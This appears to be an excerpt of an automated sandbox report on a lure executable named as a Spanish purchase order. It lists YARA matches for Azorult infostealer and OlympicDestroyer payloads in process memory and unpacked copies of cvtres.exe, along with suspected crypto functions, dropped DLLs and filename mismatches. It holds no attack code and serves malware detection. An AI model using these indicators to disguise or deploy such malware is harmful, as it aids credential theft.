Source: 1.2.cvtres.exe.7e35982.5.raw.unpack, type: UNPACKEDPE	Matched rule: OlympicDestroyer Payload Author: kevoreilly
Source: 1.2.cvtres.exe.7e3b8e3.4.raw.unpack, type: UNPACKEDPE	Matched rule: OlympicDestroyer Payload Author: kevoreilly
Source: 1.2.cvtres.exe.7e414d2.6.raw.unpack, type: UNPACKEDPE	Matched rule: OlympicDestroyer Payload Author: kevoreilly
Source: 00000001.00000000.248942345.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Azorult_38fce9ea Author: unknown
Source: 00000001.00000000.248942345.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Azorult Payload Author: kevoreilly
Source: 00000001.00000000.248942345.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Azorult in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000000.249057187.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Azorult_38fce9ea Author: unknown
Source: 00000001.00000000.249057187.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Azorult Payload Author: kevoreilly
Source: 00000001.00000000.249057187.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Azorult in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000000.248993320.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Azorult_38fce9ea Author: unknown
Source: 00000001.00000000.248993320.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Azorult Payload Author: kevoreilly
Source: 00000001.00000000.248993320.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Azorult in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.298767805.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Azorult_38fce9ea Author: unknown
Source: 00000001.00000002.298767805.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Azorult Payload Author: kevoreilly
Source: 00000001.00000002.298767805.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Azorult in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000000.249215469.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Azorult_38fce9ea Author: unknown
Source: 00000001.00000000.249215469.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Azorult Payload Author: kevoreilly
Source: 00000001.00000000.249215469.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Azorult in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000000.248868745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Azorult_38fce9ea Author: unknown
Source: 00000001.00000000.248868745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Azorult Payload Author: kevoreilly
Source: 00000001.00000000.248868745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Azorult in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.250173775.0000000003A41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Azorult_38fce9ea Author: unknown
Source: 00000000.00000002.250173775.0000000003A41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Azorult in memory Author: JPCERT/CC Incident Response Group

Yara signature match

Source: 1.0.cvtres.exe.400000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Azorult_38fce9ea reference_sample = 405d1e6196dc5be1f46a1bd07c655d1d4b36c32f965d9a1b6d4859d3f9b84491, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Azorult, fingerprint = 0655018fc803469c6d89193b75b4967fd02400fae07364ffcd11d1bc6cbbe74a, id = 38fce9ea-a94e-49d3-8eef-96fe06ad27f8, last_modified = 2021-10-04
Source: 1.0.cvtres.exe.400000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
Source: 1.0.cvtres.exe.400000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Azorult author = JPCERT/CC Incident Response Group, description = detect Azorult in memory, rule_usage = memory scan, reference = internal research
Source: 1.0.cvtres.exe.400000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Azorult_38fce9ea reference_sample = 405d1e6196dc5be1f46a1bd07c655d1d4b36c32f965d9a1b6d4859d3f9b84491, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Azorult, fingerprint = 0655018fc803469c6d89193b75b4967fd02400fae07364ffcd11d1bc6cbbe74a, id = 38fce9ea-a94e-49d3-8eef-96fe06ad27f8, last_modified = 2021-10-04
Source: 1.0.cvtres.exe.400000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
Source: 1.0.cvtres.exe.400000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Azorult author = JPCERT/CC Incident Response Group, description = detect Azorult in memory, rule_usage = memory scan, reference = internal research
Source: 1.0.cvtres.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Azorult_38fce9ea reference_sample = 405d1e6196dc5be1f46a1bd07c655d1d4b36c32f965d9a1b6d4859d3f9b84491, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Azorult, fingerprint = 0655018fc803469c6d89193b75b4967fd02400fae07364ffcd11d1bc6cbbe74a, id = 38fce9ea-a94e-49d3-8eef-96fe06ad27f8, last_modified = 2021-10-04
Source: 1.0.cvtres.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
Source: 1.0.cvtres.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Azorult author = JPCERT/CC Incident Response Group, description = detect Azorult in memory, rule_usage = memory scan, reference = internal research
Source: 1.0.cvtres.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Azorult_38fce9ea reference_sample = 405d1e6196dc5be1f46a1bd07c655d1d4b36c32f965d9a1b6d4859d3f9b84491, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Azorult, fingerprint = 0655018fc803469c6d89193b75b4967fd02400fae07364ffcd11d1bc6cbbe74a, id = 38fce9ea-a94e-49d3-8eef-96fe06ad27f8, last_modified = 2021-10-04
Source: 1.0.cvtres.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
Source: 1.0.cvtres.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Azorult author = JPCERT/CC Incident Response Group, description = detect Azorult in memory, rule_usage = memory scan, reference = internal research
Source: 1.0.cvtres.exe.400000.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Azorult_38fce9ea reference_sample = 405d1e6196dc5be1f46a1bd07c655d1d4b36c32f965d9a1b6d4859d3f9b84491, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Azorult, fingerprint = 0655018fc803469c6d89193b75b4967fd02400fae07364ffcd11d1bc6cbbe74a, id = 38fce9ea-a94e-49d3-8eef-96fe06ad27f8, last_modified = 2021-10-04
Source: 1.0.cvtres.exe.400000.3.unpack, type: UNPACKEDPE	Matched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
Source: 1.0.cvtres.exe.400000.3.unpack, type: UNPACKEDPE	Matched rule: Azorult author = JPCERT/CC Incident Response Group, description = detect Azorult in memory, rule_usage = memory scan, reference = internal research
Source: 1.0.cvtres.exe.400000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Azorult_38fce9ea reference_sample = 405d1e6196dc5be1f46a1bd07c655d1d4b36c32f965d9a1b6d4859d3f9b84491, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Azorult, fingerprint = 0655018fc803469c6d89193b75b4967fd02400fae07364ffcd11d1bc6cbbe74a, id = 38fce9ea-a94e-49d3-8eef-96fe06ad27f8, last_modified = 2021-10-04
Source: 1.0.cvtres.exe.400000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
Source: 1.0.cvtres.exe.400000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Azorult author = JPCERT/CC Incident Response Group, description = detect Azorult in memory, rule_usage = memory scan, reference = internal research
Source: 1.2.cvtres.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Azorult_38fce9ea reference_sample = 405d1e6196dc5be1f46a1bd07c655d1d4b36c32f965d9a1b6d4859d3f9b84491, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Azorult, fingerprint = 0655018fc803469c6d89193b75b4967fd02400fae07364ffcd11d1bc6cbbe74a, id = 38fce9ea-a94e-49d3-8eef-96fe06ad27f8, last_modified = 2021-10-04
Source: 1.2.cvtres.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
Source: 1.2.cvtres.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Azorult author = JPCERT/CC Incident Response Group, description = detect Azorult in memory, rule_usage = memory scan, reference = internal research
Source: 1.0.cvtres.exe.400000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Azorult_38fce9ea reference_sample = 405d1e6196dc5be1f46a1bd07c655d1d4b36c32f965d9a1b6d4859d3f9b84491, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Azorult, fingerprint = 0655018fc803469c6d89193b75b4967fd02400fae07364ffcd11d1bc6cbbe74a, id = 38fce9ea-a94e-49d3-8eef-96fe06ad27f8, last_modified = 2021-10-04
Source: 1.0.cvtres.exe.400000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
Source: 1.0.cvtres.exe.400000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Azorult author = JPCERT/CC Incident Response Group, description = detect Azorult in memory, rule_usage = memory scan, reference = internal research
Source: 1.0.cvtres.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Azorult_38fce9ea reference_sample = 405d1e6196dc5be1f46a1bd07c655d1d4b36c32f965d9a1b6d4859d3f9b84491, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Azorult, fingerprint = 0655018fc803469c6d89193b75b4967fd02400fae07364ffcd11d1bc6cbbe74a, id = 38fce9ea-a94e-49d3-8eef-96fe06ad27f8, last_modified = 2021-10-04
Source: 1.0.cvtres.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
Source: 1.0.cvtres.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: Azorult author = JPCERT/CC Incident Response Group, description = detect Azorult in memory, rule_usage = memory scan, reference = internal research
Source: 1.2.cvtres.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Azorult_38fce9ea reference_sample = 405d1e6196dc5be1f46a1bd07c655d1d4b36c32f965d9a1b6d4859d3f9b84491, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Azorult, fingerprint = 0655018fc803469c6d89193b75b4967fd02400fae07364ffcd11d1bc6cbbe74a, id = 38fce9ea-a94e-49d3-8eef-96fe06ad27f8, last_modified = 2021-10-04
Source: 1.2.cvtres.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
Source: 1.2.cvtres.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Azorult author = JPCERT/CC Incident Response Group, description = detect Azorult in memory, rule_usage = memory scan, reference = internal research
Source: 1.0.cvtres.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Azorult_38fce9ea reference_sample = 405d1e6196dc5be1f46a1bd07c655d1d4b36c32f965d9a1b6d4859d3f9b84491, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Azorult, fingerprint = 0655018fc803469c6d89193b75b4967fd02400fae07364ffcd11d1bc6cbbe74a, id = 38fce9ea-a94e-49d3-8eef-96fe06ad27f8, last_modified = 2021-10-04
Source: 1.0.cvtres.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
Source: 1.0.cvtres.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: Azorult author = JPCERT/CC Incident Response Group, description = detect Azorult in memory, rule_usage = memory scan, reference = internal research
Source: 1.0.cvtres.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Azorult_38fce9ea reference_sample = 405d1e6196dc5be1f46a1bd07c655d1d4b36c32f965d9a1b6d4859d3f9b84491, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Azorult, fingerprint = 0655018fc803469c6d89193b75b4967fd02400fae07364ffcd11d1bc6cbbe74a, id = 38fce9ea-a94e-49d3-8eef-96fe06ad27f8, last_modified = 2021-10-04
Source: 1.0.cvtres.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
Source: 1.0.cvtres.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Azorult author = JPCERT/CC Incident Response Group, description = detect Azorult in memory, rule_usage = memory scan, reference = internal research
Source: 1.0.cvtres.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Azorult_38fce9ea reference_sample = 405d1e6196dc5be1f46a1bd07c655d1d4b36c32f965d9a1b6d4859d3f9b84491, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Azorult, fingerprint = 0655018fc803469c6d89193b75b4967fd02400fae07364ffcd11d1bc6cbbe74a, id = 38fce9ea-a94e-49d3-8eef-96fe06ad27f8, last_modified = 2021-10-04
Source: 1.0.cvtres.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
Source: 1.0.cvtres.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: Azorult author = JPCERT/CC Incident Response Group, description = detect Azorult in memory, rule_usage = memory scan, reference = internal research
Source: 1.2.cvtres.exe.7e35982.5.raw.unpack, type: UNPACKEDPE	Matched rule: OlympicDestroyer_1 author = kevoreilly, description = OlympicDestroyer Payload, cape_type = OlympicDestroyer Payload
Source: 1.2.cvtres.exe.7e3b8e3.4.raw.unpack, type: UNPACKEDPE	Matched rule: OlympicDestroyer_1 author = kevoreilly, description = OlympicDestroyer Payload, cape_type = OlympicDestroyer Payload
Source: 1.2.cvtres.exe.7e414d2.6.raw.unpack, type: UNPACKEDPE	Matched rule: OlympicDestroyer_1 author = kevoreilly, description = OlympicDestroyer Payload, cape_type = OlympicDestroyer Payload
Source: 00000001.00000000.248942345.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Azorult_38fce9ea reference_sample = 405d1e6196dc5be1f46a1bd07c655d1d4b36c32f965d9a1b6d4859d3f9b84491, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Azorult, fingerprint = 0655018fc803469c6d89193b75b4967fd02400fae07364ffcd11d1bc6cbbe74a, id = 38fce9ea-a94e-49d3-8eef-96fe06ad27f8, last_modified = 2021-10-04
Source: 00000001.00000000.248942345.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
Source: 00000001.00000000.248942345.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Azorult author = JPCERT/CC Incident Response Group, description = detect Azorult in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000000.249057187.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Azorult_38fce9ea reference_sample = 405d1e6196dc5be1f46a1bd07c655d1d4b36c32f965d9a1b6d4859d3f9b84491, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Azorult, fingerprint = 0655018fc803469c6d89193b75b4967fd02400fae07364ffcd11d1bc6cbbe74a, id = 38fce9ea-a94e-49d3-8eef-96fe06ad27f8, last_modified = 2021-10-04
Source: 00000001.00000000.249057187.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
Source: 00000001.00000000.249057187.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Azorult author = JPCERT/CC Incident Response Group, description = detect Azorult in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000000.248993320.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Azorult_38fce9ea reference_sample = 405d1e6196dc5be1f46a1bd07c655d1d4b36c32f965d9a1b6d4859d3f9b84491, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Azorult, fingerprint = 0655018fc803469c6d89193b75b4967fd02400fae07364ffcd11d1bc6cbbe74a, id = 38fce9ea-a94e-49d3-8eef-96fe06ad27f8, last_modified = 2021-10-04
Source: 00000001.00000000.248993320.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
Source: 00000001.00000000.248993320.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Azorult author = JPCERT/CC Incident Response Group, description = detect Azorult in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.298767805.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Azorult_38fce9ea reference_sample = 405d1e6196dc5be1f46a1bd07c655d1d4b36c32f965d9a1b6d4859d3f9b84491, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Azorult, fingerprint = 0655018fc803469c6d89193b75b4967fd02400fae07364ffcd11d1bc6cbbe74a, id = 38fce9ea-a94e-49d3-8eef-96fe06ad27f8, last_modified = 2021-10-04
Source: 00000001.00000002.298767805.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
Source: 00000001.00000002.298767805.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Azorult author = JPCERT/CC Incident Response Group, description = detect Azorult in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000000.249215469.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Azorult_38fce9ea reference_sample = 405d1e6196dc5be1f46a1bd07c655d1d4b36c32f965d9a1b6d4859d3f9b84491, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Azorult, fingerprint = 0655018fc803469c6d89193b75b4967fd02400fae07364ffcd11d1bc6cbbe74a, id = 38fce9ea-a94e-49d3-8eef-96fe06ad27f8, last_modified = 2021-10-04
Source: 00000001.00000000.249215469.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
Source: 00000001.00000000.249215469.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Azorult author = JPCERT/CC Incident Response Group, description = detect Azorult in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000000.248868745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Azorult_38fce9ea reference_sample = 405d1e6196dc5be1f46a1bd07c655d1d4b36c32f965d9a1b6d4859d3f9b84491, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Azorult, fingerprint = 0655018fc803469c6d89193b75b4967fd02400fae07364ffcd11d1bc6cbbe74a, id = 38fce9ea-a94e-49d3-8eef-96fe06ad27f8, last_modified = 2021-10-04
Source: 00000001.00000000.248868745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
Source: 00000001.00000000.248868745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Azorult author = JPCERT/CC Incident Response Group, description = detect Azorult in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.250173775.0000000003A41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Azorult_38fce9ea reference_sample = 405d1e6196dc5be1f46a1bd07c655d1d4b36c32f965d9a1b6d4859d3f9b84491, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Azorult, fingerprint = 0655018fc803469c6d89193b75b4967fd02400fae07364ffcd11d1bc6cbbe74a, id = 38fce9ea-a94e-49d3-8eef-96fe06ad27f8, last_modified = 2021-10-04
Source: 00000000.00000002.250173775.0000000003A41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Azorult author = JPCERT/CC Incident Response Group, description = detect Azorult in memory, rule_usage = memory scan, reference = internal research

Detected potential crypto function

Source: C:\Users\user\Desktop\NUEVA ORDEN-MATSA 10-2022,.exe	Code function: 0_2_028B0448	0_2_028B0448
Source: C:\Users\user\Desktop\NUEVA ORDEN-MATSA 10-2022,.exe	Code function: 0_2_028B4E48	0_2_028B4E48
Source: C:\Users\user\Desktop\NUEVA ORDEN-MATSA 10-2022,.exe	Code function: 0_2_028B17C9	0_2_028B17C9
Source: C:\Users\user\Desktop\NUEVA ORDEN-MATSA 10-2022,.exe	Code function: 0_2_028B2D08	0_2_028B2D08
Source: C:\Users\user\Desktop\NUEVA ORDEN-MATSA 10-2022,.exe	Code function: 0_2_028B3B08	0_2_028B3B08
Source: C:\Users\user\Desktop\NUEVA ORDEN-MATSA 10-2022,.exe	Code function: 0_2_028BB4B8	0_2_028BB4B8
Source: C:\Users\user\Desktop\NUEVA ORDEN-MATSA 10-2022,.exe	Code function: 0_2_028B2CF8	0_2_028B2CF8
Source: C:\Users\user\Desktop\NUEVA ORDEN-MATSA 10-2022,.exe	Code function: 0_2_028BAA11	0_2_028BAA11
Source: C:\Users\user\Desktop\NUEVA ORDEN-MATSA 10-2022,.exe	Code function: 0_2_028BAA20	0_2_028BAA20
Source: C:\Users\user\Desktop\NUEVA ORDEN-MATSA 10-2022,.exe	Code function: 0_2_028B0427	0_2_028B0427
Source: C:\Users\user\Desktop\NUEVA ORDEN-MATSA 10-2022,.exe	Code function: 0_2_028B2078	0_2_028B2078
Source: C:\Users\user\Desktop\NUEVA ORDEN-MATSA 10-2022,.exe	Code function: 0_2_028BDFD8	0_2_028BDFD8
Source: C:\Users\user\Desktop\NUEVA ORDEN-MATSA 10-2022,.exe	Code function: 0_2_028BB508	0_2_028BB508
Source: C:\Users\user\Desktop\NUEVA ORDEN-MATSA 10-2022,.exe	Code function: 0_2_028BD958	0_2_028BD958
Source: C:\Users\user\Desktop\NUEVA ORDEN-MATSA 10-2022,.exe	Code function: 0_2_028BBF60	0_2_028BBF60

Found potential string decryption / allocating functions

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Code function: String function: 00403B98 appears 44 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Code function: String function: 00404E64 appears 33 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Code function: String function: 00404E3C appears 87 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Code function: String function: 004062D8 appears 34 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Code function: String function: 004034E4 appears 36 times

PE file does not import any functions

Source: api-ms-win-core-handle-l1-1-0.dll.1.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-string-l1-1-0.dll.1.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-synch-l1-2-0.dll.1.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-memory-l1-1-0.dll.1.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-sysinfo-l1-1-0.dll.1.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-debug-l1-1-0.dll.1.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-utility-l1-1-0.dll.1.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-environment-l1-1-0.dll.1.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-processthreads-l1-1-0.dll.1.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-heap-l1-1-0.dll.1.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-console-l1-1-0.dll.1.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-process-l1-1-0.dll.1.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-file-l1-1-0.dll.1.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-file-l2-1-0.dll.1.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-runtime-l1-1-0.dll.1.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-string-l1-1-0.dll.1.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-profile-l1-1-0.dll.1.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-file-l1-2-0.dll.1.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-libraryloader-l1-1-0.dll.1.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-localization-l1-2-0.dll.1.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-datetime-l1-1-0.dll.1.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-time-l1-1-0.dll.1.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-locale-l1-1-0.dll.1.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-processthreads-l1-1-1.dll.1.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-namedpipe-l1-1-0.dll.1.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-filesystem-l1-1-0.dll.1.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-multibyte-l1-1-0.dll.1.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-stdio-l1-1-0.dll.1.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-util-l1-1-0.dll.1.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-errorhandling-l1-1-0.dll.1.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-math-l1-1-0.dll.1.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-private-l1-1-0.dll.1.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-processenvironment-l1-1-0.dll.1.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-interlocked-l1-1-0.dll.1.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-heap-l1-1-0.dll.1.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-rtlsupport-l1-1-0.dll.1.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-synch-l1-1-0.dll.1.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-conio-l1-1-0.dll.1.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-timezone-l1-1-0.dll.1.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-convert-l1-1-0.dll.1.dr	Static PE information: No import functions for PE file found

Sample file is different than original file name gathered from version info

Source: NUEVA ORDEN-MATSA 10-2022,.exe, 00000000.00000000.244217715.0000000000786000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameNMCVXCXMXKJDFGDJKJDF.exeJ vs NUEVA ORDEN-MATSA 10-2022,.exe
Source: NUEVA ORDEN-MATSA 10-2022,.exe, 00000000.00000002.250033059.0000000002A70000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameBROTHERS.dll2 vs NUEVA ORDEN-MATSA 10-2022,.exe
